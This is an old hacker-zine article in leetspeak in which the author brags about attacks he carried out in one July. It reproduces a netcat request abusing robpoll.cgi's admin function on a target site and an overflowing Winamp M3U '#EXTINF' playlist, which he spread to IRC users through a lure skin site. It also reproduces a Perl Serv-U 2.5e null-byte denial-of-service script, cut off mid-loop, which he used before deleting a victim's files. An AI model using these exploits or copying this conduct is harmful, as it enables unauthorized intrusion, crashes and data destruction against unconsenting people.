A 101 Bytez team article for Hackinthebox mag
[editor’s note: I have tried to preserve the original language of his article as much as possible to reflect its “l33t sp34k” roots, but readability and common grammar at times prohibited this effort.]
Written By : OZONE
Title: July Hack
Discussing : | ROBPOLL.cgi | Winamp buffer overflow | Servu 2.5 e buffer overflow | Vision of NET
Ok so i've talked to a lot of newbies during my netlife and they all wanted to know how i had done this hax or that trick etc., so this year after having finished work i decided to write all the underground things i'll do in july. But first of all i went on holidaysz in july so all these tricks were done in about 2 weeks. I'd like to thanks Packet-storm & securityfocus for giving us the knowledge and also the power. Please note that this article isn't talking about my life but u'll learn all the tricks i've done.
N°1
Ok so first trick: a friend icq’ed me and asked me to scan a website that we'll name IAD. after a little scan i didn't find many much security problems except a cgi called robpoll.cgi
and i received this
1: Add New Question
2: Remove Question
3: Change Password
i read alt3kx article about this security vulnerability and used his attack
CUT
## - Author alt3kx -
## (www.raza-mexicana.org)
##
##
#!/bin/bash
echo -e "GET http://IAD/cgi-bin/robpoll.cgi?Admin
HTTP/1.0nn" | nc xxx.server.com 80
CUT
It's a powerful remote attack that leads, in my case, into a quite gud l00king j00t //
N°2
Ok so this second trick is really gud. it was a monday night 03:00 and i found a kewl buffer overflow in PS database concerning Winamp M3U playlist parser under W$ 9x so i tried it with mine before attacking lamerz. this is how it works:
The overflow happens when an M3U extension called "#EXTINF:" is being
handled. The size of the parameter following that keyword is not checked. this attack allows a total control .
CUT
#EXTM3U
#EXTINF:AAAAAAAAA....AAAAAAAAA
CUT
there should be 280 - 290 A save it in a file like Laurent.M3U .
so after that i've done like the author of this trick i've created a winamp XXX skin site
and i went in a MP3 irc chanwith a l0000t of script kiddiz [unlike the author] and said that i had a XXX animated skinz for winamp on my page and u can trust me 4 of them told me that they had a 0000:41414141 error with winamp while looking my page :)))
N°3
Ok so i'm sorry another Win trick against something i hate: "Servu Warez XXX ftpz." bwooooo, so i was speaking with my friendz on irc when 3 warez kidz entered the chan (a quite huge chan) and started trigger saying that they had loooots of XXX with no ratio so u know, with my friends, we say that WAREZ is LAME and we really think it's not B coz u've got 200 unreleased ISO that u are underground men ! it's just becoz u've got a gud connec at the end of this doc i'll show u our vision of the net but it's not the matter n0w. So we saw that one of them was using Serv-U 2.5e. hehe, we know a fuckin trick to burn his c0000mputer so i used it note that i didn't modified anything in this c0de it's perfect :
CUT
#!/usr/bin/perl
#
# FTP Serv-U 2.5e denial-of-service
# Blue Panda - bluepanda@dwarf.box.sk
# http://bluepanda.box.sk/
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
# Crashes FTP Serv-U 2.5e by sending it a string of null bytes.
#
use IO::Socket;
$host = "ftp.host.com";
$port = "21";
print "Connecting to $host:$port...";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "failed.n";
print "done.n";
$counter = 0;
$buf = "";
while ($counter
CUT
want to know how it works ? ok no pb here we go: if u send FTP Serv-U a string containing a large number of null bytes it will cause a stack fault. The system Serv-U is running on may become
sluggish/unstable and eventually bluescreen. No user/pass combination is needed. :)))
So for da storry we erased all his warez and yes i know erasing isn't hacking ethic but he was serving XXX child the bastard so we erased 4ll and let him a woups.txt with ":)" inside that's all.
N°4 End
So sorry for this july hacking a bit Winish but remember it was only in 2 weeks so here u've got our point of view on the net u can tell us what u think of it DCSELL@hotmail.com it's DCSELL mail hehe
TOP Linux Developpers (AMEN)
9 Hackers
8 Crackers
7 Rippers
6 ElectroZ
5 Linux Basic users
4 Warezers
3 Carderz
2 Lamerz
1 Basic surfer hacking with macOS
***********************************************************************************
Special shoutz to: the 101 crew (FLAMBY | SLUM) / Bignoze /Vince/ PS_SEcfocus / l1pht / leetdawg / Cyberdom & IAD staff /floz / Benstaff /Fana /Twigg / Mc/
http://www.101bytez.com
***********************************************************************************
1.) Are you a hacker? - JesterS
2.)X-Mail - JesterS
3.)Getting Under the GUI - Liquid Sphear
4.)Opening Simple Ports on Win X - madirish
5.)Commentary on Napster and the Digital Age -
SiLeRePrAeSes
6.)Commentary on the Political Aspects of the Internet
-
SiLeRePrAeSes
7.)How to (re)build your kernel
- L33tdawg
8.)A 101 Bytez team article for Hackinthebox mag
- OZONE
9.)Examining PE Files - abrams!metaray
